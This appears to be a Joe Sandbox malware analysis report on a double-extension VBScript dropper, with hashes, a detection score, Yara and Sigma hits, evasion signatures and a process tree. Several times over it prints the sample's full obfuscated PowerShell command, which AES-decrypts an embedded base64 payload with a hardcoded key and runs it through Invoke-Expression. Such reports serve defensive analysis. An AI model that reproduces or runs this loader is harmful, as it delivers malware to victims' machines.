Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
creatednewwaterbottleforme.gIF.vbs

Overview

General Information

Sample name:creatednewwaterbottleforme.gIF.vbs
Analysis ID:1483435
MD5:94734cb139b6b9025fd8a1acc56027db
SHA1:b385368bcaadaca073849a413660b68e690ffba5
SHA256:7dde4d5f845dbb2a078f6d0a290472d22cc845c6d6927cc0ada645ce050c7b08
Tags:vbs
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Cscript/Wscript Uncommon Script Extension Execution
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2104 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\creatednewwaterbottleforme.gIF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 2144JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 2144INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x18267:$b2: ::FromBase64String(
    • 0x19772:$b2: ::FromBase64String(
    • 0x1bc09:$b2: ::FromBase64String(
    • 0x3323c:$b2: ::FromBase64String(
    • 0x33cc9:$b2: ::FromBase64String(
    • 0x346bf:$b2: ::FromBase64String(
    • 0x369fa:$b2: ::FromBase64String(
    • 0x4e89e:$b2: ::FromBase64String(
    • 0x56a37:$b2: ::FromBase64String(
    • 0x1b9cf8:$b2: ::FromBase64String(
    • 0x1ba8d9:$b2: ::FromBase64String(
    • 0x1bfd20:$b2: ::FromBase64String(
    • 0x1c084e:$b2: ::FromBase64String(
    • 0x1c16f3:$b2: ::FromBase64String(
    • 0x1db301:$b2: ::FromBase64String(
    • 0x665c7f:$b2: ::FromBase64String(
    • 0x666860:$b2: ::FromBase64String(
    • 0x668224:$b2: ::FromBase64String(
    • 0x66b368:$b2: ::FromBase64String(
    • 0x672f44:$b2: ::FromBase64String(
    • 0x67b0dd:$b2: ::FromBase64String(
    SourceRuleDescriptionAuthorStrings
    amsi64_2144.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      amsi64_2144.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\creatednewwaterbottleforme.gIF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\creatednewwaterbottleforme.gIF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\creatednewwaterbottleforme.gIF.vbs", ProcessId: 2104, ProcessName: wscript.exe
        Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\creatednewwaterbottleforme.gIF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\creatednewwaterbottleforme.gIF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\creatednewwaterbottleforme.gIF.vbs", ProcessId: 2104, ProcessName: wscript.exe
